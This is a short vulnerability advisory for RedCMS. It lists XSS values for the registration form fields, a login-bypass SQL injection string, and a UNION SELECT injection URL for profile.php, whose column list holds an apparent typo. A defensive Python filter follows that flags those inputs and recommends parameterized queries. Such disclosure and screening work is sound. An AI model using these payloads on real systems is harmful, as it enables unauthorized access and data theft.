PoC/Exploit for Multiple XSS and SQL Injection in RedCMS

Published Proof of Concept code - Multiple XSS and SQL Injection in RedCMS.

Description: Available
Solution: Not available - check vendor's website

1. Cross-Site Scripting Example.

URL: http://[host]/redcms/register.php

Email: aaa'>[XSS]<aaa aaa=';

Location: aaa'>[XSS]<aaa aaa=';

Website: aaa'>[XSS]<aaa aaa=';

2. SQL Injection Examples.

URL: http://[host]/redcms/login.php

Username: ' or 1/*

Password: any

URL: http://[host]/redcms/profile.php?id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,161,7,18,19,20/*
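
With no vendor fix listed, requests to the three scripts above can be screened in front of the application. The following is an added example, not part of the original advisory or of RedCMS: a Python check that flags the value shapes shown above. The form field names (lower-cased labels), the integer-only profile id and host.example are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> fields named in the advisory (field names assumed to be the lower-cased labels).
XSS_FIELDS = {"register.php": ("email", "location", "website")}
SQLI_FIELDS = {"login.php": ("username",), "profile.php": ("id",)}

# Quote followed by an angle bracket: the attribute-breakout shape of the register.php values.
ATTR_BREAKOUT = re.compile(r"""['"]\s*[<>]""")
# Quote followed by a SQL keyword or comment opener: the shape of the login.php value.
SQL_META = re.compile(r"""['"].*?(\bor\b|\bunion\b|\bselect\b|/\*|--|#)""", re.I | re.S)

def inspect_request(url, form=None):
    """Return [(script, field, finding), ...] for one request (form = POST fields or None)."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    params = {k.lower(): list(v) for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    for key, value in (form or {}).items():
        params.setdefault(key.lower(), []).append(value)
    findings = []
    for field in XSS_FIELDS.get(script, ()):
        if any(ATTR_BREAKOUT.search(v) for v in params.get(field, [])):
            findings.append((script, field, "attribute-breakout"))
    for field in SQLI_FIELDS.get(script, ()):
        for v in params.get(field, []):
            if field == "id":
                # Assumption: profile ids are plain decimal integers, so allow-list them.
                if not re.fullmatch(r"[0-9]+", v):
                    findings.append((script, field, "non-numeric-id"))
            elif SQL_META.search(v):
                findings.append((script, field, "sql-metacharacters"))
    return findings

# Constructed sample requests (host.example is a placeholder), using the advisory's value shapes.
SAMPLES = [
    ("http://host.example/redcms/profile.php?id=99'%20union%20select%201,2,3/*", None),
    ("http://host.example/redcms/profile.php?id=99", None),
    ("http://host.example/redcms/login.php", {"username": "' or 1/*", "password": "any"}),
    ("http://host.example/redcms/register.php", {"email": "aaa'>[XSS]<aaa aaa=';"}),
    ("http://host.example/redcms/register.php", {"email": "alice@example.org"}),
]

if __name__ == "__main__":
    for url, form in SAMPLES:
        print(url, form, inspect_request(url, form))
```

Screening of this kind only reduces exposure; the underlying fix is parameterized queries in login.php and profile.php and output encoding of the registration fields.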
